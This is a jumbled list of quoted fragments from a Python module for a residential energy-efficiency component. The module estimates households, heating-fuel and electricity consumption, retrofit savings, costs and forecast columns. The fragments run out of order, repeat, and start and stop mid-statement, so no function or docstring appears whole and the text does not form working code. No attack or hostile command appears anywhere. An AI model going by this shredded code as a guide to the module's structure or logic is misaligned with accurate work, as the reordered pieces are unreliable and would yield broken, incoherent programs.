self.init_HH percent_accounted =", "Heating Fuel All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year)", "consumption\" \" corrected to \"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name,", "self.init_solar #~ self.init_other msg = str(round(percent_accounted)) + \\ \" of residential fuel sources", "1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF)", "total energy produced. Returns ------- float the total energy produced \"\"\" # no", "Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total = area *", "Heating Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All", "* gas_price s_NG_cost = b_NG_cost - r_NG_cost years = np.array(range(self.project_life)) + self.start_year df", "Post Retrofit\": r_oil_cost , \"Residential: Heating Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating", "Heating Fuel All (MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Cost Post", "a community forecast : Forecast forecast for a community diagnostics : diagnostics, optional", "the performance improvements as a percentage of the pre-retrofit consumption, and the forecasted", "price'] gas_price = self.cd['natural gas price'] else: HF_price = np.nan wood_price = np.nan", "year of the project Attributes ---------- init_HH : int estimated households for first", "consumption baseline_fuel_gas_consumption : np.array baseline natural gas consumption baseline_fuel_LP_consumption : np.array baseline propane", "prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print", "np.array proposed total electric consumption 
\"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption", "---------- proposed_kWh_consumption : np.array set to baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def", "units that have not been retrofit as of 2010, the performance improvements as", "Post Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption Savings\", \"Residential: Heating Biomass (cords/year) Consumption", "\"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price = HF_price wood_price =", "the potential improvements to heating efficiency of residential buildings (homes). Consumption and savings", "amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted", "Attributes ---------- proposed_kWh_consumption : np.array set to baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption", "Cost Post Retrofit\": r_oil_cost , \"Residential: Heating Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential:", "range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed", "see information on Forecast Object aaem.diagnostics : diagnostics module, see information on Diagnostics", "Energy, and Internal Rate of Return will all be calculated. 
There must be", "= np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler = (HH - self.init_HH) * area *", "self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~ self.init_other msg", "aaem.constants as constants from config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency", "(Mcf/year) Cost Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\", \"Residential: Heating", "has a default value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating", "Attributes ---------- init_HH : int estimated households for first year of project \"\"\"", "calc_avg_consumption (self): \"\"\"Get the average monthly consumption of electricity for a house. Attributes", "+ \\ self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self):", "years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\", "electric consumption \"\"\" rd = self.comp_specs['data'] ## total consumption total = rd[\"Total Consumption", "project Attributes ---------- annual_electric_savings : np.array electric savings ($/year) are the difference in", "* \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption", "heating efficiency of residential buildings (homes). 
Consumption and savings are based on the", "run : bool True in the component runs to completion, False otherwise reason", "components, optional prerequisite component data this component has no prerequisites leave empty Attributes", "avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \" corrected to \"+ str(con_threshold)+\"", "= (HH - self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\", "r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption", "community forecast for estimating future values initial value: forecast cd : dictionary general", "self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities()", "= df[[ \"Residential: Heating Oil (gallons/year) Consumption Baseline\", \"Residential: Heating Oil (gallons/year) Consumption", "value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH()", "from aaem.forecast import Forecast from aaem.diagnostics import Diagnostics import aaem.constants as constants from", "\"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years,", "optional prerequisite component data \"\"\" self.diagnostics = diag if self.diagnostics == None: self.diagnostics", "self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() 
self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'],", "self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self): \"\"\"calculate base line heating fuel costs Attributes", "Heating Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\":", "* gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost - r_NG_cost years", "self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\",", "(Mcf/year) Consumption Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\", \"Residential: Heating", "= self.households #~ print HH area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI =", "a community Attributes ---------- baseline_kWh_consumption : np.array electric consumption per yer \"\"\" HH", "error/warning messages prerequisites : dictionary of components, optional prerequisite component data \"\"\" self.diagnostics", "= np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP)", "Houses that can be retrofit savings_HF : float savings in heating oil consumption", "Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year)", "= avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) 
amnt = np.float64(rd[\"LP\"])", "self.forecast.base_pop self.init_HH = int(round(HH*(val / pop))) def calc_init_consumption (self): \"\"\"Calculate the initial consumption", "consumption proposed_HF_consumption : np.array proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption", "\"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years,", "community Attributes ---------- baseline_kWh_consumption : np.array electric consumption per yer \"\"\" HH =", "(self): \"\"\"calculate annual electric savings created by the project Attributes ---------- annual_electric_savings :", "\"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption Savings\",", "def calc_annual_heating_savings (self): \"\"\"calculate annual heating savings created by the project Attributes ----------", "self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self,", "= 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was negative, setting to 0\" )", "see information on CommunityData Object aaem.forecast : forecast module, see information on Forecast", "= b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP", "fuel saved in gallons \"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ 
self.proposed_HF_consumption[:self.actual_project_life]", "= community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]:", "Cost Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\", \"Residential: Heating Fuel", "fuel type. Attributes ---------- init_HF : float initial heating oil consumption init_wood :", "forecast : forecast community forecast for estimating future values initial value: forecast cd", "\\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption", "Heating Natural Gas (Mcf/year) Cost Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Cost", "\"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year) Consumption", "decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit", "Electric Heat (kWh/year) Cost Savings\", \"Residential: Heating Propane (gallons/year) Cost Baseline\", \"Residential: Heating", "avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar", "consumption savings_LP : float savings in propane consumption savings_kWh : float savings in", "= \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption =", "= rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"])", "(self): \"\"\"calculate baseline electricity costs Attributes 
---------- baseline_kWh_cost : np.array baseline cost of", "of components, optional prerequisite component data \"\"\" self.diagnostics = diag if self.diagnostics ==", "Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption Savings\", \"Residential: Heating Propane (gallons/year) Consumption Baseline\",", "each home is also calculated. Parameters ---------- community_data : CommunityData CommunityData Object for", "Object \"\"\" def __init__ (self, community_data, forecast, diag = None, prerequisites = {}):", "Natural Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost", "\"Residential: Heating Biomass (cords/year) Cost Baseline\", \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\",", "fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed heating oil consumption proposed_fuel_wood_consumption :", "r_elec, \"Residential: Electric Heat (kWh/year) Consumption Savings\": s_elec, \"Residential: Electric Heat (kWh/year) Cost", "[gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption)", ": diagnostics for tracking error/warning messages initial value: diag or new diagnostics object", "also -------- aaem.community_data : community data module, see information on CommunityData Object aaem.forecast", "* constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas price'] ==", "df = df.round().astype(int) except ValueError: pass df = df[[ \"Residential: Heating Oil (gallons/year)", "\"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Oil 
(gallons/year) Consumption Savings\",", "CommunityData Object for a community forecast : Forecast forecast for a community diagnostics", "(self): \"\"\"Calculate the initial consumption for each fuel type. Attributes ---------- init_HF :", "gas consumption baseline_fuel_LP_consumption : np.array baseline propane consumption baseline_fuel_kWh_consumption : np.array baseline electricity", "and has a default value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model", ": np.array baseline propane consumption baseline_fuel_kWh_consumption : np.array baseline electricity consumption baseline_HF_consumption :", "1 and tag[1] != 'residential': self.was_run = False self.reason = \"Not a residential", "to heating efficiency of residential buildings (homes). Consumption and savings are based on", "cf: float conversion factor Returns ------- float: fuel consumed for a type of", "rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0 HH = self.households #~", "HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt,", "Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption Savings\", \"Residential: Electric Heat (kWh/year) Consumption Baseline\",", "if self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption = 0 # coal,solar, other def", "+\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH,", "s_oil = b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption", "np.array proposed heating fuel cost \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium'])", "(homes). 
Consumption and savings are based on the number of units that have", ": float a # of houses cf: float conversion factor Returns ------- float:", "from aaem.diagnostics import Diagnostics import aaem.constants as constants from config import COMPONENT_NAME, UNKNOWN", "cost \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price']", "\"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost =", "gas fuel consumption savings_LP : float savings in propane consumption savings_kWh : float", "normal run variables. See note on accepted scalers Attributes ---------- run : bool", "\"\"\"Get total fuel saved. Returns ------- float the total fuel saved in gallons", "Natural Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\",", "buildings HH : float a # of houses cf: float conversion factor Returns", "'Residential Energy Efficiency', 'data' )['average kWh per house'] #~ self.avg_monthly_consumption = ave_con/12 if", "Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\", \"Residential: Heating Fuel All", "coal,solar, other def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh consumption for a community", "= self.cd['propane price'] gas_price = self.cd['natural gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption *", "self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self): \"\"\"Calculate the capital costs. Attributes ---------- capital_costs", "= self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption", "for failure if run == False Notes ----- Accepted scalers: capital costs. 
\"\"\"", "(cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric", "(gallons/year) Consumption Baseline\", \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Oil", "avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"])", "self.cd['propane price'] gas_price = self.cd['natural gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price", "Savings\": s_oil, \"Residential: Heating Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year)", "+ self.start_year df = DataFrame({ \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(),", "self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self):", "Heating Natural Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year)", "(MMBtu/year) Cost Savings\", \"Residential: Total Cost Savings ($/year)\", \"Residential: Net Benefit ($/year)\" ]]", "np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI", "= self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH ) #~ print", "Consumption Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\", \"Residential: Heating Fuel", "Savings\", \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\", \"Residential: Heating Natural Gas (Mcf/year)", "* wood_price s_bio_cost = b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = 
self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh", "in \" + str(yr)) def calc_init_HH (self): \"\"\"Estimate the # of households for", "to adjust normal run variables. See note on accepted scalers Attributes ---------- run", "= self.comp_specs['data'] ## total consumption total = rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES", "of Return will all be calculated. There must be a known Heat Recovery", "= self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt", "= None, prerequisites = {}): \"\"\"Class initialiser Parameters ---------- community_data : CommunityData CommunityData", "avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total = area * EUI # the", "- r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost", "Gas (Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\":", "Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating", "\"\"\" # 500 average energy use, 12 months in a year. 
That's where", "self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating fuel", "improvements as a percentage of the pre-retrofit consumption, and the forecasted price of", ": np.array proposed electric consumption proposed_HF_consumption : np.array proposed total electric consumption \"\"\"", "error/warning messages prerequisites : dictionary of components, optional prerequisite component data this component", "* LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other def calc_baseline_kWh_cost (self):", "(1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption", "households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val =", "'community' section of community_data comp_specs : dictionary component specific data for a community.", "(MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\", \"Residential: Heating", "self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption", "self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf)", "rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg", "community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if", "- \\ 
self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the average monthly consumption of electricity", "is an identity amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction *", "self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop)", "self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0]", "amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total,", "Attributes ---------- baseline_kWh_consumption : np.array electric consumption per yer \"\"\" HH = self.households", "self.comp_specs['data'] ## total consumption total = rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES Total", "s_NG_cost, \"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(), },", "prerequisites : dictionary of components, optional prerequisite component data this component has no", "the difference in the base and proposed fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life)", "\"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Cost", "## % as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings)", "accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH", "'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], 
self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop", "self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\", "the initial consumption for each fuel type. Attributes ---------- init_HF : float initial", "(kWh/year) Consumption Post Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year) Consumption Savings\": s_elec, \"Residential:", "community_data : CommunityData CommunityData Object for a community forecast : Forecast forecast for", "Post Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year) Consumption Savings\": s_bio, \"Residential: Heating Biomass", "Baseline\", \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption", "= float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns =", "tracking error/warning messages initial value: diag or new diagnostics object forecast : forecast", "Electric consumption\" \" corrected to \"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con", "total savings in mmbtu \"\"\" rd = self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH", "\"Residential: Heating Biomass (cords/year) Consumption Savings\", \"Residential: Electric Heat (kWh/year) Consumption Baseline\", \"Residential:", "self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~ self.init_other msg = str(round(percent_accounted))", "/ 100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF)", "messages initial value: diag or new diagnostics object forecast : forecast community forecast", "initial heating cordwood consumption init_gas : float 
initial natural gas fuel consumption init_LP", "post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total energy produced. Returns ------- float", "b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year)", "gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost - r_NG_cost years =", "init_HH : int estimated households for first year of project \"\"\" val =", "#~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices()", "Retrofit\", \"Residential: Heating Propane (gallons/year) Cost Savings\", \"Residential: Heating Natural Gas (Mcf/year) Cost", "year \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price = HF_price wood_price", ": float average electric consumption per household (kWh/year). >= 6000 \"\"\" # 500", "Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year) Consumption Savings\": s_oil, \"Residential: Heating Oil (gallons/year)", "Heat Recovery project for this component to run. 
Parameters ---------- scalers : dictionary", "= rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit", "def calc_baseline_fuel_cost (self): \"\"\"calculate base line heating fuel costs Attributes ---------- baseline_HF_cost :", "proposed_HF_consumption : np.array proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption -", "self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year'])", "Propane (gallons/year) Consumption Savings\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating", "aaem.diagnostics : diagnostics module, see information on Diagnostics Object \"\"\" def __init__ (self,", "Cost Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\", \"Residential: Heating Fuel", "constants from config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of", "\\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost", "---------- proposed_fuel_Hoil_consumption : np.array proposed heating oil consumption proposed_fuel_wood_consumption : np.array proposed cordwood", "Heating Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\":", "Savings\": s_LP, \"Residential: Heating Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year)", "float total cost of improvements ($) \"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate def", "\"Residential: Heating Natural Gas 
(Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total Cost Savings ($/year)\":", "- r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost", "tag = self.cd['file id'].split('+') if len(tag) > 1 and tag[1] != 'residential': self.was_run", "self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual electric savings created by the", "= self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost", "Fuel All (MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\",", "gas price'] else: HF_price = np.nan wood_price = np.nan elec_price = np.nan LP_price", "or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \" corrected to", "= self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption =", "community forecast : Forecast 